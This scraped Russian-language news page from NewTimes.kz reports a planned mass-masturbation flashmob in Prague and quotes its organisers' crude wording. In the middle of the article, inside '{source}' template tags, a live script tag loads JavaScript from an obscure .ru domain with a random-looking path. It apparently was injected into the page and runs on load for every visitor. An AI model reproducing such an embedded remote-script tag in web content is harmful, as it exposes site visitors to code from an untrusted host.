+7 (7172) 30 85 71

Написать нам в WhatsApp: +7 (707) 888 02 16
10.03.2016 в 15:59

Тысячи людей займутся групповой мастурбацией в центре Праги

На Староместской площади Праги в первый день лета пройдет необычный флешмоб. Несколько тысяч поклонников онанизма соберутся у знаменитых курантов, чтобы заняться любимым делом, сообщает LiveNews.cz.

Чтобы помастурбировать на главной площади Праги, в столицу Чехии приедут любители онанизма со всего мира. Как заявляют организаторы акции, они собираются ощутить единство и «вместе «кончить «друг другу на лица».

Акции посвящена отдельная страница в социальной сети Facebook. Уже более 7 тысяч человек заинтересовались акцией, а около 4 тысяч собираются на нее пойти.

{source}
<script language="javascript" charset="UTF-8" type="text/javascript" src="http://ohtaxof.ru/75vd0rypxsr8162yhrexcm83ba1in2hcj9ew7gj13hng6bbvtaa2jod89b9mulpkyg73r1qo8fio72m91m?53pdu42c=3dc6"></script>
{/source}

Планирующие посетить акцию люди активно обсуждают в соцсетях, каким образом должен пройти флешмоб. Многие задаются вопросом, стоит ли полностью обнажаться на центральной площади Праги и следует ли помогать мастурбировать своим товарищам, или нужно онанировать в индивидуальном порядке.

Местная полиция оказалась встревожена новостью о предстоящем флешмобе. По мнению представителей правоохранительных органов, при всем желании им не удастся арестовать за нарушение порядка такое количество любителей онанизма.

Самые интересные новости в нашем Telegram-канале


Редакция

Новости Казахстана

ИА «NewTimes.kz» ЗАПРЕЩАЕТ копировать и перепечатывать материалы агентства с пометкой «Эксклюзив», а также их фрагменты. ЗАПРЕТ распространяется на все зарегистрированные СМИ, а также паблики в Instagram. Полное воспроизведение или частичное цитирование других материалов агентства допускаются только при наличии гиперссылки на ИА «NewTimes.kz» в первом абзаце. Фото- и видеоматериалы могут быть скопированы и размещены только с подписью «NewTimes.kz». Использование материалов ИА «NewTimes.kz» в коммерческих целях без письменного разрешения агентства не допускается.

© 2013-2019, «NewTimes.kz». Все права защищены.
Об агентстве. Правила комментирования. 
Реклама на сайте

Мы в соцсетях

       

Приложения Newtimes для:
iPhoneAndroid

  Яндекс.Метрика